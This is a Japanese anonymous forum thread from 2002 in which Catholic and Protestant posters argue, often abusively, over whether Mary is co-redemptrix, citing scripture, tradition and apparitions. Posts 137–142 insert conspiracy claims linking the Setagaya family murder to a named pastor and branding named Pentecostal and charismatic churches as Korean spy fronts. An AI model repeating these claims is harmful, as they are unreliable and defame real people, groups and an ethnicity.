 5、教会の母1964年

今後教皇様によって定められる3つ1つの教義
 6、共贖者マリア(キリストと共に苦しむ者)
 7、仲介者マリア(すべての恵みの取り次ぎ者)
 8、擁護者マリア(神の民の代弁者、執り成し手、助け手、保護者)
 (6−7を1つにして「すべての民の御母マリア」と宣言されます)

これをもって、ファティマで聖母が約束された、『平和の時代』が
訪れます。そして、マリアは、平和の元后として、すべての民から
愛されることになるでしょう。

122 :名無しさん@1周年:02/12/06 13:21
>>119-121
捏造と言われても仕方なかろう。
キリスト教徒を馬鹿にしてねえか?
そいつら。

123 :名無しさん@1周年:02/12/06 13:37
>>119-121
すばらしいという他ないですね。
キリスト教徒の精神そのものですね。

124 :名無しさん@1周年:02/12/06 13:39
>>123
どこがどうキリスト教の精神なんだよ?

125 :名無しさん@1周年:02/12/06 13:43
>>124すべて、聖書で証明できるから。

126 :名無しさん@1周年:02/12/06 13:46
>>125
聖書の参照箇所を示してもらいたい。

127 :名無しさん@1周年:02/12/06 14:05
>>126

その手には乗らないよん。
自分で勉強したら?
こっちが幾ら説明しても信じないんだから.......
もう飽きたよん。w

128 :名無しさん@1周年:02/12/06 14:16
>>127

これくらいで勘弁したらあ。WWW

129 :散歩の途中:02/12/06 15:41
「マリヤを共同贖罪者」とするような聖書の個所なんて、いくらさがしても出てこないよ。
マリア崇敬なら、それに該当すると思われそうな個所もあるけどね。

130 :名無しさん@1周年:02/12/06 15:47
>>123
マリア教の精神

>>127
逃げてら 情けない

131 :名無しさん@1周年:02/12/06 16:06
>>129
聖書しか知らないの?貧相だね!w
カトリックには初代教父から諸聖人を通して受け継がれてきた、
尊い聖伝があるよ。

プロはそれを捨てちまったから、聖書にどんな解釈でも
できるようになったというだけ。いい加減だね。

挙句の果てが、100万の分派で、どれもこれも、かって放題な
聖書解釈をしてそれを正統と名乗っている。どうにかしたら?ww

132 :名無しさん@1周年:02/12/06 16:06
カトリックのために言ってるんだが、
無茶な事を強行しても、自分らの首をしめる
だけなんだけどね。

133 :名無しさん@1周年:02/12/06 16:07
>>130
>>132

カトリックは、教父や諸聖人の苦労して残した
霊的遺産に基づいて
聖書解釈をする2000年の歴史があるのです。
マリアの出現は、AD70年以来、今日にまで継続されている
天からのしるし。教父も聖人もみなマリアを崇敬して今日に至っている。
プロでも広く読まれている『キリストに倣いて』の著者、
トマス・ア・ケンピスもそう。聖フランシスもそうです。
聖伝を捨てたプロテスタントはマリアを理解できなくなったというだけ。
マリアの出現は、プロの理解に関わりなく
2000年近くの間起こっている「事実」です。事実を認めなさい!

134 :名無しさん@1周年:02/12/06 16:09
プロは出現のマリアが恐いんだろ〜

さんざッぱら、出現の聖母を悪魔だと罵倒してきたからね。
自分の説を守らなきゃならなくなったというだけ。
wwwwwwwwww

135 :名無しさん@1周年:02/12/06 16:10
>>132

聖書しか知らないの?貧相だね!w
カトリックには初代教父から諸聖人を通して受け継がれてきた、
尊い聖伝があるよ。

プロはそれを捨てちまったから、聖書にどんな解釈でも
できるようになったというだけ。いい加減だね。

挙句の果てが、100万の分派で、どれもこれも、かって放題な
聖書解釈をしてそれを正統と名乗っている。どうにかしたら?ww




136 :名無しさん@1周年:02/12/06 16:14
>>131 >>133
聖書をないがしろにする人の言い逃れの言葉ですね
非聖書的な教えを一生懸命に極めようとする、その努力はたいしたものですが
それは所詮キリストの御旨に沿ったのとはなりえません

137 :名無しさん@1周年:02/12/06 16:16
ペンテコステ派は恐ろしい。
世田谷一家惨殺事件と韓国系ペンテコ派

 泰子さんは礼くんのために、医師だけではなく各種相談員や同じ子供
を持つ親らとも交流を持ち、相談に乗ってもらっていたという。そして、
ここに康成輝との接触の可能性が生まれてくる。

「康は、牧師を自称していました。新宿7丁目のバプティスト系教会に出
入りして、そこを拠点に、韓国からの留学生の相談に乗っていた。南朝鮮
にスパイ容疑で長期間囚われている同胞の帰国推進運動に関与したため、
それを嫌った韓国の国家情報院と日本の公安警察の謀略に引っ掛かったの
です。」

「康は、『ヨベルの会』というキリスト教系のボランティアにも関わって
いました」(上記2点=『別冊宝島Real―公安アンダーグラウンド―』)

138 :名無しさん@1周年:02/12/06 16:16
「康被告は日本の『国際キリストセンター』事務総長として97年、北
朝鮮の『朝鮮宗教人協議会』との間で、朝鮮半島平和を目指す合意書を
作成した。」 (『毎日新聞』平成12年12月13日)

 本誌は事件当初から宮沢みきおさん一家4人殺害事件と康成輝事件と
の関連性を考えてきた。宮沢みきおさんが北朝鮮工作員・康成輝と関係
を持つようになり、その秘密をバラし、結果として対韓国工作網が破壊
されたことに対する報復が行われたのではないかと推測してきた。その
推測には現在も自信を持っている。

 しかし、宮沢みきおさんがなぜ康成輝と関係を持つようになったのかは
正直なところ理解ができなかった。泰子さんが在日であるといわれるが、
在日だからといって康成輝と直接結びつくわけではない。

 だが、礼くんが言語障害児でそうした関係の人物と会う機会があれば―
―国際キリストセンター事務総長でもありボランティア活動をしていた牧
師・康成輝と会う確率はものすごく高まる。

139 :名無しさん@1周年:02/12/06 16:19
 『新潮45』誌の一橋文哉氏の記述に、さらに興味深い情報もある。
 「……偶然の一致にせよ、気になるのは『カネダ』という名前だ。
泰子さんの姉が嫁いだ先が金田なのである。……ところで、『カネダ』
はある団体に所属し、そこは日本はもとより世界各地に関連施設を所有
している。都内では杉並区や渋谷区、そして世田谷区の宮沢さん宅付近
にもあるという。」

 「……実行犯は宮沢さん宅の裏から祖師谷公園方面に逃げているが、そ
の逃走経路の延長線上に、何と『カネダ』が所属する団体の関連施設があ
ったのである。」

 犯行現場である宮沢みきおさん宅から祖師谷公園を結ぶと、その延長上
にあるのは『宣教教会』である。これは「日本福音キリスト教会連合
(福音連合)」の一つである。

140 :名無しさん@1周年:02/12/06 16:19

 本紙は宗教界やキリスト教関連の団体について明確に分析ができて
いないので、明確なことは語れない。いずれにしても康成輝が関わっ
ていた「国際キリストセンター」も「宣教教会」も「賜物系(カリス
マ系)=神からの賜物を強調する派」とされる。

 〔癒し〕や〔リバイバル〕〔異言〕というキーワードを持つ宗教団体
で、〔第三の波〕〔カリスマ運動〕等といった運動で、最近とくに活動が
盛んだとされる。「日本アッセンプリーズ・オブ・ゴッド教団」、「日本フ
ォースクエアー教団」、「チャーチ・オブ・ゴッド」、「純福音教会」等々が
こうした団体で、半島系の牧師が活躍しているのも特徴の一つだ。


141 :名無しさん@1周年:02/12/06 16:19
>>135

カトリックで不滅の教義に定められている聖母マリアの5ドグマ
 1、テオトコス(神の母)341年
 2、終生童貞649年
 3、無原罪懐胎1854年
 4、被昇天 1950年
 5、教会の母1964年

どれもこれも、キリストの時代から何百年どころか、3番以後はさらに
+千年たってからのものじゃないかよ。これを信じろいう方がどうかしてる。
ナンセンスがまかり通るところが、宗教の困ったところだ。

142 :名無しさん@1周年:02/12/06 16:25
             警戒!

韓国系スパイのフロント組織になっている危険なペンテコ一覧。
http://www.gyouseinews.com/storehouse/mar2002/001.html

1、〔癒し〕や〔リバイバル〕〔異言〕というキーワードを持つ宗教団体
2、〔第三の波〕〔カリスマ運動〕等といった運動
3、「日本アッセンプリーズ・オブ・ゴッド教団」
4、「日本フォースクエアー教団」
5、「チャーチ・オブ・ゴッド」、
6、「純福音教会」等々。
7.こうした団体で、半島系の牧師が活躍している団体。

143 :【】:02/12/06 16:26
>>141
全面的に賛成です。これらの教義

 1、テオトコス(神の母)341年
 2、終生童貞649年
 3、無原罪懐胎1854年
 4、被昇天 1950年
 5、教会の母1964年

はキリストの教えではありません
カトリックは「キリスト教」の看板を早く下ろして
「マリヤ教」を名乗りましょう。

144 :名無しさん@1周年:02/12/06 16:29
ore san ha kankoku no hito?

145 :141:02/12/06 16:30
>>143
わりいが、折れカトリックなんよ。
最近教会内でも、聖伝持ち出すのは
古い人だけだな。


146 :名無しさん@1周年:02/12/06 16:37
>>143

聖伝を無視することはできないだろうね。
キリストの使徒以来の重要な聖書解釈の宝庫なのであるからね。
テオトコスにしても、それら五つの教理にしても、初代教父の
著述に既出である。十分に調べてから物をいいなさい。
あなた方さえ、聖書を勉強するのに神学書や解説書、
注釈書を参考にした覚えがあるはずだ。
ユダは書簡の中でエノク書を引用しているが、これなど、
使徒たちががいてんをよくよんでいて、信仰の糧にしていた証明。
新約以来それに対比できる多くの優れた教父の作品がある。
しいてそれに目を閉じるというのは、キリスト教徒のすることではない。

147 :名無しさん@1周年:02/12/06 16:42
>>145
聖伝を無視することはできないだろうね。
キリストの使徒以来の重要な聖書解釈の宝庫なのであるからね。
テオトコスにしても、それら五つの教理にしても、初代教父の
著述に既出である。十分に調べてから物をいいなさい。

あなたさえ、聖書を勉強するのに神学書や解説書、
注釈書を参考にした覚えがあるはずだ。
ユダは書簡の中で偽典エノク書を引用しているが、これなど、
使徒たちが「偽典」をよくよんでいて、信仰の糧にしていた証明。

正典とされている聖書の中に偽典が入っているというのは、
何とも皮肉なことではないか。新約以来それに対比できる
多くの優れた教父の作品がある。しいてそれに目を閉じるというのは、
カトリックのすることではない。

148 :141:02/12/06 16:46
>>146

聖伝は要するに人から人への「言い伝え」なのであって、
最初は史実であったとしても時間の経過とともに変形され
たり、単なる想像や間違いやら、嘘が入り込んだりするものだ。
意図的に有りもしない話が伝わったものもあるだろう。
あまりに信憑性に問題があるものを持ち込むは危険だと思うが。


149 :名無しさん@1周年:02/12/06 16:58
>>121
>今後教皇様によって定められる3つ1つの教義
> 6、共贖者マリア(キリストと共に苦しむ者)
> 7、仲介者マリア(すべての恵みの取り次ぎ者)
> 8、擁護者マリア(神の民の代弁者、執り成し手、助け手、保護者)
マリア様を仲介者、弁護者と呼ぶのは古くから認められている伝承でしょ。
但し、キリストの仲介や弁護とは区別されているはず。
今後認められるであろう共贖も、キリストの贖罪とは区別されるはず。

150 :【】:02/12/06 17:01
>>145
それは気がつかなかった、スマソ
信じにくい教えを声高く唱導する教会に参加するのはさぞかし
つらいのではないでしょうか、どうか気を落とさずに。

151 :散歩の途中:02/12/06 17:02
>>131
聖伝くらい、よく存じ上げておりますでつ。
カルタゴ公会議以前の聖伝を、どう取り扱うか、ということについては、
プロテスタントの間でも一致を見ていないと思いますよ。
だから、マリア崇敬については、私は是も非も申し上げてはおりませぬ。

もう一度伺いますが、「マリヤを共同贖罪者」とするにふさわしい聖書の個所は?
あるいは、聖伝でもよろしいから、教えて下され。

152 :マルタ ◆JKiO8VJvj2 :02/12/06 17:15
>>145
第2バチカン公会議公文書全集
「神の啓示に関する教義憲章」2章9節(聖伝と聖書の関係)
したがって聖伝と聖書とは互いに堅く結ばれ、互いに共通するものである。
なぜならば、どちらも同一の神的起源をもち、ある程度一体をなし、同一の目的に向かっているからである。
実際、聖書は、聖霊の霊感によって書かれた神の話である。そして、聖伝は、主キリストと聖霊から使徒たち
に託された神のことばを余すところなくその後継者に伝え、
後継者たちは、真理の霊の導きの下に、説教によって忠実に保ち、説明し、普及するようにするものである。
そのため教会は聖書だけから啓示されたすべてのことについて自分の確信を得るのではない。それゆえ、
どちらも同じ敬虔と敬意をもって受け入れ尊敬されるべきである。

153 :マルタ ◆QcceiRnRO2 :02/12/06 17:25
>>148それはあなたの偏見。

154 :マルタ ◆QcceiRnRO2 :02/12/06 17:26
>>149
ひとのを勝手にコピーするな。

155 :マルタ ◆QcceiRnRO2 :02/12/06 17:27
>>151自分で勉強しなさいよ。子供じゃあるまいしさ。

156 :【】:02/12/06 17:32
聖伝が聖書を踏み越えることが有ってはなりません。

>>129 同意します。
>>131 賛成できません。

157 :マルタ ◆QcceiRnRO2 :02/12/06 17:34
>>156
それは2c名無しさんの偏見

158 :マルタ ◆JKiO8VJvj2 :02/12/06 17:39
>>148
>聖伝は要するに人から人への「言い伝え」なのであって、
聖書も言い伝えです。そもそも、ヨハネ福音書は使徒ヨハネが書いた歴史的証拠はありませんが、
正典として認められています。また、使徒パウロの書簡などで、本人によるものではない物も幾つかあります。
キリストがマタイ 15:6などで批判している「自分の言い伝え」とは、
「神のみを敬え」という命題から、「神さえ敬えば父母は敬わなくてもいい」
みたいな他の信仰を侵害するするような命題を導くという、
ファリサイ派のような原理主義特有の事柄を対象としているだけです。
例えば、エペソ 5:18から聖体拝領にブドウ酒の使用を禁じるのは、
神の言葉を無にする典型的な自分の言い伝えになると思います。

159 :マルタ ◆JKiO8VJvj2 :02/12/06 17:42
>>129
>>31をご覧下さい。

160 :マルタ ◆QcceiRnRO2 :02/12/06 17:42
1番の言い伝えを作ってきたのはプロなのよ!わかってないね

161 :名無しさん@1周年:02/12/06 19:08
聖書なんて所詮は聖伝の一部に過ぎないのさ。
それを聖書があって次に聖伝がつくられたと信じ込んでいるのがおかしいのさ。

162 :名無しさん@1周年:02/12/06 19:28
>>161
だからと言って、でたらめかと言えばそうでもないのが
聖書のおもしろいところ。

163 :名無しさん@1周年:02/12/06 19:29
>>162
だからと言って、でたらめかと言えばそうでもないのが
聖伝のおもしろいところ。


164 :名無しさん@1周年:02/12/06 19:33
>>163
じゃあ、聖伝も元の形に復元し、嘘みたいのは削除
してくんない?

165 :名無しさん@1周年:02/12/06 19:35
聖書よりも古いものだけ保存して
その他は焼いてしまうのが吉かと

166 :名無しさん@1周年:02/12/06 19:57
>>164
教皇の使徒座宣言されたもの以外は、修正の余地はあるけど。
そうしたものは、これまで沢山あるしね。
また、今さら肉の血を絞って食べるとか、安息日を土曜日にするとかしたくないね。
逆に訊くけど、聖書の修正の余地はあるんですか?例えば、
使徒 7:16 シケムに移され、かつてアブラハムがシケムでハモルの子らから、幾らかの金で買っておいた墓に葬られました。
は旧約の伝承
創世 50:13 すなわち、ヤコブの息子たちは、父のなきがらをカナンの土地に運び、マクペラの畑の洞穴に葬った。それは、アブラハムがマムレの前にある畑とともにヘト人エフロンから買い取り、墓地として所有するようになったものである。
ヨシュア 24:32 イスラエルの人々がエジプトから携えてきたヨセフの骨は、その昔、ヤコブが百ケシタで、シケムの父ハモルの息子たちから買い取ったシケムの野の一画に埋葬された。それは、ヨセフの子孫の嗣業の土地となった。
と矛盾しますが。

167 :名無しさん@1周年:02/12/06 20:01
>>165
それなら、今から肉は血を絞って使徒 15:20-29, 21:25、安息日は土曜日としたら。
立派なエホ証になれますよ。

168 :名無しさん@1周年:02/12/06 20:05
>>166
他にも聖書の細々した矛盾点はある。
が、指摘されておられる矛盾点は学者を除いては、
一般のキリスト教徒にとってそれほど重要性があ
るとは思えないんだが。

169 :名無しさん@1周年:02/12/06 20:13
>>168
学者じゃなくても、一般注解書を読めば誰でも知ることは可能です。
人によっては、その矛盾点につまづくこともあるでしょう。
その典型的な例がユダヤ人やエホ証ではないですか。
たとえ、神感の書物とはいえ人が信仰でもって残した伝承であるという
フレキシブルな考えで聖書を捉えないと、エホ証が増えて仕方がありません。

170 :名無しさん@1周年:02/12/06 20:21
>>1
マリアを神の母と認めないというのも、異端の教義(ネストリウス異端)だけど。
議論に加えてください。

171 :「共贖者マリア(キリストと共に苦しむ者)」聖書からの証明1:02/12/06 20:34
「共贖者マリア(キリストと共に苦しむ者)」聖書からの証明1

「われわれは神の協力者である」(聖パウロ)Tコリ3:9

パウロは、キリスト者は神の協力者であると証しています。
キリスト者を名乗る誰もが神の協力者であります。マリアも神との協力者
であります。では、全能の神になぜ協力者が必要なのでしょうか?何に協力
するのでしょうか。神の業は贖罪です。地上で神の贖罪に協力し、救霊に
勤しむためであります。キリストの贖罪は世の続く限り、天にて
行われている。キリストは永遠の大祭司であられる。それに協力するのが、
贖罪協力者。共贖者である。

172 :名無しさん@1周年:02/12/06 20:34
「共贖者マリア(キリストと共に苦しむ者)」聖書からの証明2

「ですから、私は、あなたがたのために受ける苦しみを喜び
としています。そして、キリストのからだのために、私の身をもって、
キリストの苦しみの欠けたところを満たしているのです。
キリストのからだとは、教会のことです。」(聖パウロ)コロ1:24

「教会のためにわが身をもってキリストの苦しみの欠けた所を満たすため
罪人のために苦しみを受け、それを喜びとする。」
これをカトリックでは「共贖者」の一語に表しているのであります。
共贖者という語がお嫌いであれば、上の長文を受け入れなさい。

173 :「共贖者マリア(キリストと共に苦しむ者)」聖書からの証明3:02/12/06 20:35
「共贖者マリア(キリストと共に苦しむ者)」聖書からの証明3

「だれも私を煩わさないようにしてください。私は、この身に、
イエスの焼き印を帯びているのですから。」(ガラテア6:17)

聖パウロばかりか、聖フランシス、聖パードレ・ピオも、共贖者として、
キリストの苦しみを身に負った。その目に見える現象を「聖痕」と呼ぶ。

ガラテア書でパウロが言った「焼き印」は、ギリシャ語の「スティグマ」
である。それは聖痕(スティグマータ)の原語である。すなわち、
パウロが共贖者であったもう1つの証明である。

174 :「共贖者マリア(キリストと共に苦しむ者)」聖書からの証明4:02/12/06 20:35
「共贖者マリア(キリストと共に苦しむ者)」聖書からの証明4

では、祝されし聖マリアはどうか。マリアは聖シメオンより預言された。

「あなたの心臓も突き刺されます。多くの人の心の思いが現れるため」
(ルカ2:35)

共贖者はみな、熾天使セラフの火の剣を心臓に受けて、キリストの御受難
を共にしてきた。すなわち、シメオンがマリアに対して告げた、まさにそ
のとおりのものを身に受けている。マリアが共贖者の母たる所以である。
アーメン。

175 :マリアの8つの教義:02/12/06 20:40
教皇様は、聖母の無原罪懐胎教理制定150周年の2004年に、マリア
共贖宣言をなさりたいご意向です。10月29日、教皇庁アカデミー
第7会議で、「2004年に向け、聖母についての豊富な神学研究と
さらなる調査をするよう」言われました。
http://www.zenit.org/english/visualizza.phtml?sid=27072

メジュゴリエが認められるのは時間の問題です。教皇様は、
メジュゴリエを非常に大切になさっておられます。実に、
メジュゴリエがこれほど世界的な運動になったのも、
教皇様の支援なしには、達し得なかったことなのです。

オランダの啓示ではファチマで聖母が約束された「平和の時代」の
到来が、「教皇様が聖母共贖者の最終教理を使徒座から宣言する」、
すなわち、公的にカトリックのドグマに採用するときに始まると預言
されています。メジュゴリエはファチマの継続にして実現。
オランダはその橋渡しです。

176 :マリアの8つの教義:02/12/06 20:40
なお、これがカトリックのドグマとして正式に採用されることになれば、
これまでの5つに続き、3つが不滅の教義として定められることに
なります。なぜでしょう?

教皇、ヨハネ・パウロ二世が世界をマリアの汚れなき御心に奉献なさり、
世界がすべての民の御母のものであることを、教皇様と共なる司教全員
が受け入れたからです。受け入れたからには、この通りに進みます。
この動きは変えられません。

マリアは、カトリック、非カトリックを問わず、全世界から民を集め、
キリストに招きます。これに逆らうも、従うも自由意志に任されます。
悪意をもって逆らう人はサタン(゛逆らう者”)にそそのかされて
います。その一味にならないように注意してください。

177 :マリアの8つの教義:02/12/06 20:41
カトリックで不滅の教義に定められている聖母マリアの5ドグマ
 1、テオトコス(神の母)341年
 2、終生童貞649年
 3、無原罪懐胎1854年
 4、被昇天 1950年
 5、教会の母1964年

今後教皇様によって定められる3つ1つの教義
 6、共贖者マリア(キリストと共に苦しむ者)
 7、仲介者マリア(すべての恵みの取り次ぎ者)
 8、擁護者マリア(神の民の代弁者、執り成し手、助け手、保護者)
 (6−7を1つにして「すべての民の御母マリア」と宣言されます)

これをもって、ファティマで聖母が約束された、『平和の時代』が
訪れます。そして、マリアは、平和の元后として、すべての民から
愛されることになるでしょう。

178 :シスター・ブリージ:02/12/06 22:14
マリアは無原罪懐胎、終生童貞です!!!
ルターも、ツウィングリも、ウェスレーも証言しています。
プロは観念しなさい。これ以上、罪の上塗りをしてはなりません。

ルターの証言
「マリアの霊魂の受胎が原罪なく行われたというのは、甘美なる、
敬虔なる信仰である。すなわち、霊魂の受胎そのものにおいて、
マリアもまた原罪を免れ、神の賜物に満たされ、神によって受胎する
純なる霊魂を受け、こうして、生の最初の瞬間から、すべての罪を
拭われていたという信仰である。」
("On the Day of the Conception of the Mother of God," 1527).

「マリアは恵みに満ち、まったく罪がないと宣言される。
何と素晴らしいこと。神の恵みは、マリアをあらゆる善で満たし、
あらゆる悪から免れさせた」 (Personal {"Little"} Prayer Book, 1522).

179 :シスター・ブリージ:02/12/06 22:15
ツウィングリ
「私は、神のおん母、永遠に純潔なる、原罪なき童貞マリアを篤く敬う。
キリストはいとも清き童貞からお生まれになった」
(Stakemeier, E. in De Mariologia et Oecumenismo, Balic, K., ed.,
Rome, 1962, p. 456.)

ジョン・ウェスレー
「私は信じる…イエス・キリストが祝されし童貞からお生まれになった
ことを。マリアが、主をおうみになってからも、純潔かつ、染みなき
童貞であり続けたことを」
("Letter to a Roman Catholic," quoted in A. C. Coulter, John Wesley,
New York: Oxford University Press, 1964, 495}

180 :シスター・ブリージ:02/12/06 22:19
今まではカトリックの嘘吐きを論破するのに
時間を取られていました。
メジュゴリエの反対派が壊滅したので、
これからはプロの原理主義者に宣教します。
覚悟なさい  w

181 :マルタ ◆JKiO8VJvj2 :02/12/06 22:28
皆さんここを読みましょう。
http://www.globalserve.net/~bumblebee/ecclesia/mary.htm
マリア様の聖伝に関する聖書からの証しが示されています。

182 :名無しさん@1周年:02/12/06 22:32
>>181馬鹿野郎!英語じゃネーカ。日本語でリンクしやがれ!視ね!

183 :名無しさん@1周年:02/12/06 22:36
カトリックの方々(まともな方々)は外国語に優秀な方ばかりなのですね。尊敬します。何と我々は不勉強だったのでしょう。不勉強なのでしょう。首に碾き臼を掛けて湖に身を投げたくなりました。マリアを信じます。メジュゴリエを信じます。1プロテスタント信徒。

184 :マルタ ◆JKiO8VJvj2 :02/12/06 22:38
このサイトも面白い。カルヴィンも、マリアの終生童貞を支持しているみたいです。
http://www.forthelife.org/PERPETUALVIRGINITY.htm


185 :名無しさん@1周年:02/12/06 22:39

マリヤは共同贖罪者だったと言うことでOKね?

ハイ!

クソスレ終了!



















オオバカ野郎!>1

186 :名無しさん@1周年:02/12/07 16:53
なーんだ、カトリックのほうが正しかったのか。プ

187 :名無しさん@1周年:02/12/07 16:55

なーんだ、メジュ派に言い負かされてやんの。プロって、痴呆集団か?ププ

188 :名無しさん@1周年:02/12/07 16:57
なーんだ。ルターもつイングリもかるばんも、ウェスレーも、聖ぼを崇敬してタンジャン。プロはバカだね。ケケケッ

189 :名無しさん@1周年:02/12/07 16:58
なーンだ、俺さんて、チョロイね。負けるのはやいね! ククッ!

190 :名無しさん@1周年:02/12/07 16:59
プロはアホヤ!

191 :名無しさん@1周年:02/12/07 17:00


プロはバカ丸出しちゃう?







192 :名無しさん@1周年:02/12/07 17:02
さきの「聖書からの証拠」を読んで納得するバカっているの?

なんというか、あれなら幸福の科学の霊言集や原理講論のほうがまだマシだわ。



193 :名無しさん@1周年:02/12/07 17:04
プロって、言い負かされるのはやいなあ。
アタマがよほど幼稚なんだろうなあ。
カトと較べたら、小学生と大学生だなあ。ワラ

194 :名無しさん@1周年:02/12/07 17:05

>>192オオ。負け犬君が吠えてるよ。「キャイン、キャイン・・・」w

195 :名無しさん@1周年:02/12/07 17:06
>>194

プロは犬並みってこったあ!



196 :名無しさん@1周年:02/12/07 17:08
プロ、アタマわる〜〜

キャキャ!!!



197 :名無しさん@1周年:02/12/07 17:11

まあ、
プロの諸君が
メジュ派以下であることが
わかりますた。

198 :名無しさん@1周年:02/12/07 17:12
恥だな......




199 :名無しさん@1周年:02/12/07 17:20
プロは厚顔無恥。

200 :名無しさん@1周年:02/12/07 17:22
プロの方々は御出現の聖母を考え直しましょう。

201 :名無しさん@1周年:02/12/07 17:25
ルターもツゥングリもカルバンもウェスレーも、
聖母崇敬してたとはねえ。
知らなかったよ!
ビックリだな。w


202 :名無しさん@1周年:02/12/07 17:26
プロはビックリスチャン。

203 :名無しさん@1周年:02/12/07 17:27
俺さん、
ルター、ツゥングリ、カルバン、ウェスレーを
異端として、断罪したら?
ワラワラワラワラワラワラ


204 :名無しさん@1周年:02/12/07 17:28
プロはピッグ。

205 :246 ◆4Q8hzljcwY :02/12/07 17:31
すみません、質問です。(o_o)/
こちらで、プロテスタントの批判をされてる方たちは、
カトリックの方たちなのですか?
ちと毒々しい気が★

206 :名無しさん@1周年:02/12/07 17:32
>>178>>180 シスター・ブリージさん

あなたのお蔭で、2年にわたる俺さんの聖母崇敬反対スレッドも、
終わりになるでしょう。決定的資料を御紹介下さり、感謝します。



207 :名無しさん@1周年:02/12/07 17:32
プロの愚行に聖母はまた涙を流される・・・
慈母そのものですなぁ・・・

208 :名無しさん@1周年:02/12/07 17:33
>>201その他
お前と「俺」との違いは、
お前の思考が硬直的で理解力に欠けているのと、
お前特有の幼稚さと傲慢さと冷たさが、レスによく表れている点だ。


友達いるか?

209 :名無しさん@1周年:02/12/07 17:35

ふーん.........

けきょーく、

メジュ派が俺さんをやっつけたってことかい!



210 :名無しさん@1周年:02/12/07 17:36
>>208

お前と「俺」との違いは、
お前の思考が硬直的で理解力に欠けているのと、
お前特有の幼稚さと傲慢さと冷たさが、レスによく表れている点だ。


友達いるか?


211 :名無しさん@1周年:02/12/07 17:40
>>201
ルターもツゥングリもカルバンもウェスレーも、
元はカトリックから出た奴らだから改革をはじめただけでも偉いと思うよ

改革が完成をみてからの人はマリア崇拝の名残を残していて引けないのが当然だけど

212 :名無しさん@1周年:02/12/07 18:06
>>211

崇拝ではありません。崇敬です。アタマわる〜

213 :名無しさん@1周年:02/12/07 18:07
すみません、質問です。(o_o)/
こちらで、カトリックの批判をされてる方たちは、
プロの方たちなのですか?
ちと毒々しい気が

214 :散歩の途中:02/12/07 18:16
>>151私なんですが。

>>155 :マルタ ◆QcceiRnRO2 :02/12/06 17:27
>151自分で勉強しなさいよ。子供じゃあるまいしさ。

だから、自分で勉強したのだけれども、その結果、聖母崇敬についてはともかくとして、
「共同贖罪者」と言うのは、聖書からは出てこないと思いますがね。
いくつか聖書の個所をあげておられるようですが、
それだけでは、「マリアがキリストの共同贖罪者」という釈義はできそうもない。
つまり、「マリアはキリストの共同贖罪者なんだよゴラア!」的な思想が前提にないと、
聖書の釈義だけではそういう教理は出てこない、ということですが。

215 :名無しさん@1周年:02/12/07 18:21
>>214

「ですから、私は、あなたがたのために受ける苦しみを喜び
としています。そして、キリストのからだのために、私の身をもって、
キリストの苦しみの欠けたところを満たしているのです。
キリストのからだとは、教会のことです。」
(聖パウロ)コロ1:24

「教会のためにわが身をもってキリストの苦しみの欠けた所を満たすため
罪人のために苦しみを受け、それを喜びとする。」

これをカトリックでは「共贖者」の一語に表しているのであります。
共贖者という語がお嫌いであれば、上の長文を受け入れなさい。

216 :名無しさん@1周年:02/12/07 18:25
>>215、要するに、語法の問題というだけってことね。

217 :名無しさん@1周年:02/12/07 18:27

「贖罪協力者」ならいいんですね?>>214


218 :名無しさん@1周年:02/12/07 18:32

問:共同贖罪とはなんですか?

答:「あなたがたのために受ける苦しみを喜び、キリストのからだの
ために、私の身をもって、キリストの苦しみの欠けたところを満たす」
(聖パウロ・コロサイ1:24) こと。



219 :名無しさん@1周年:02/12/07 18:51
>>214
かつて罪人であったパウロでさえ、共同贖罪に召されたのであれば、
若干15歳で、
「聖霊が臨み、いと高き方の力におおわれ、それゆえ、
聖なる者、神の子と呼ばれる嬰児を産み」(ルカ1:35)、
聖霊に満たされたエリサベツから
「祝福された方・・・主の母」
と呼ばれた原罪なきマリアができないという方がおかしい。


220 :名無しさん@1周年:02/12/07 19:00
てかさあ、>>214のような奴ってさ、
カトリックの神学の知識ゼロなんだろうな。
聖書に基づいていることも知らんのだから。
カトリックには特殊用語があるけれど、
どれも、聖書と聖伝に基づいているのさ。
俺もプロから転向したから、最初馴染むのに苦労したよ。w

221 :名無しさん@1周年:02/12/07 19:07
>>219

マリヤが最初に聖霊降臨を受けたのか。
すごいじゃん。使徒の聖霊降臨より33年も早かったんだ。



222 :名無しさん@1周年:02/12/07 19:09
聖母も罪を贖います


223 :名無しさん@1周年:02/12/07 19:16
>>221おまえ、聖書読んだことねーの?

224 :名無しさん@1周年:02/12/07 19:19
>>221
威厳言ったの?

225 :名無しさん@1周年:02/12/07 19:23
>>220
すごい馬鹿だなオマエ

226 :名無しさん@1周年:02/12/07 19:25
>>225すごいバカはオマエ

227 :名無しさん@1周年:02/12/07 19:27
>>226オマエガナー

228 :名無しさん@1周年:02/12/07 19:54
>>222
邪教の教えだ!

229 :名無しさん@1周年:02/12/07 19:56
俺さんたち、ウザイよ>>222-228

230 :散歩の途中:02/12/07 20:45
たくさんレス下さって恐縮ですが・・・

どのレスも、私が申し上げたことを反復しておられるだけです。
つまり、「はじめに教理ありき」なのですよ。
それは、ある意味正しいわけで、聖書も聖伝の一つと考えられるわけですよね。
マリアに関するすべての教説は、聖伝を抜きにしては考えられない、と思います。
それはそれでいいんです。
私が問いたいのは、そういうことではないのです。
マリア崇敬はいいとしても、マリアをキリストと同列の贖罪者とするためには、
それ相応の聖書的根拠が必要だということです。
先にあげておられた聖書のテキストからは、「マリアだけが特別な存在」と考えるには、
非常に根拠が薄いのです。
聖伝を抜きにして、釈義だけでマリア共同贖罪者論が導き出せる聖書のテキストは、
果たしてありや、なしや?
それが聞きたいのですよ。

231 :名無しさん@1周年:02/12/07 23:07
>>230

誰もキリストと「同等」だなんて言ってないでしょう?
あなたの質問の出し方が、そもそも「変」ですよ。
共同贖罪とは「キリストの苦しみを共にすること。
キリストの受難の欠けているところを埋めること。」
そういっているでしょう。何度言わせるんですか?
なら、あなたに聞きますが、パウロがキリストの贖罪を地上で手助けした
からと言って、何で、パウロがキリストと同等になりますか?
あなたがこちらの定義に耳を塞いでるだけです。

232 :名無しさん@1周年:02/12/07 23:10
>>230

「ですから、私は、あなたがたのために受ける苦しみを喜び
としています。そして、キリストのからだのために、私の身をもって、
キリストの苦しみの欠けたところを満たしているのです。
キリストのからだとは、教会のことです。」
(聖パウロ)コロ1:24

「教会のためにわが身をもってキリストの苦しみの欠けた所を満たすため
罪人のために苦しみを受け、それを喜びとする。」

これをカトリックでは「共贖者」の一語に表しているのであります。
共贖者という語がお嫌いであれば、上の長文を受け入れなさい。



233 :名無しさん@1周年:02/12/07 23:22
>>230 atama warui zo.

